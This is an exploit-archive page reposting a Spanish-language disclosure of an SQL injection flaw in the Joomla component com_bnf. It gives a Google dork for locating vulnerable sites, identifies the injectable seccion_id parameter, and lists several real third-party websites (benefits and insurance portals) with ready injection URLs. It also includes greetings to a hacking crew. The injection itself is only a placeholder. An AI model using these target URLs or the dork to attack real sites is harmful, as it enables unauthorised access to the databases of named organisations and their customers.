Home / exploitsPDF  

Joomla BNF SQL Injection

Posted on 02 February 2012

# Exploit Title: Joomla Component (com_bnf) SQL Injection
Vulnerability
# Google Dork: index.php?option=com_bnf [1]
# Date: 22/12/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar [2]
# Tested on: Linux

Visiten : www.0x3a.com.ar [3] www.remoteexecution.com.ar [4]
www.remoteexecution.info [5]

[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas,
LisandroLezaeta,Gaston Chareun,
Inyexion, Login-Root, KikoArg, Ricota,Truenex, sunplace, _tty0,
Sensei , Jorge Nuñez,
LinuxFer, Rash, Scorp, Alan++, y demas usuarios de #RemoteExecution

[SQL Injection]
El error se encuentra en la variable seccion_id
http://localhost/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL
[6] Inyection]&direccion=&direct=0&Itemid=0&lang=es

http://www.beneficioslacaja.com.ar/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL%20Inyection]&direccion=&direct=0&Itemid=0&lang=es
[7]

http://swissmedical.beneficios-corporativos.com/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL%20Inyection]&direccion=&direct=0&Itemid=0&lang=es
[8]

http://www.blueclub.com.ar/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL%20Inyection]&direccion=&direct=0&Itemid=0&lang=es
[9]

http://www.beneficioszurich.com/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=[SQL%20Inyection]&direccion=&direct=0&Itemid=0&lang=es
[10]

-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com

Links:
------
[1] http://index.php/?option=com_bnf
[2] http://www.delincuentedigital.com.ar/
[3] http://www.0x3a.com.ar/
[4] http://www.remoteexecution.com.ar/
[5] http://www.remoteexecution.info/
[6]
http://localhost/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=%5BSQL
[7]
http://www.beneficioslacaja.com.ar/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=%5BSQL%20Inyection%5D&direccion=&direct=0&Itemid=0&lang=es
[8]
http://swissmedical.beneficios-corporativos.com/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=%5BSQL%20Inyection%5D&direccion=&direct=0&Itemid=0&lang=es
[9]
http://www.blueclub.com.ar/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=%5BSQL%20Inyection%5D&direccion=&direct=0&Itemid=0&lang=es
[10]
http://www.beneficioszurich.com/index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=%5BSQL%20Inyection%5D&direccion=&direct=0&Itemid=0&lang=es

 

TOP

Malware :

Exploits :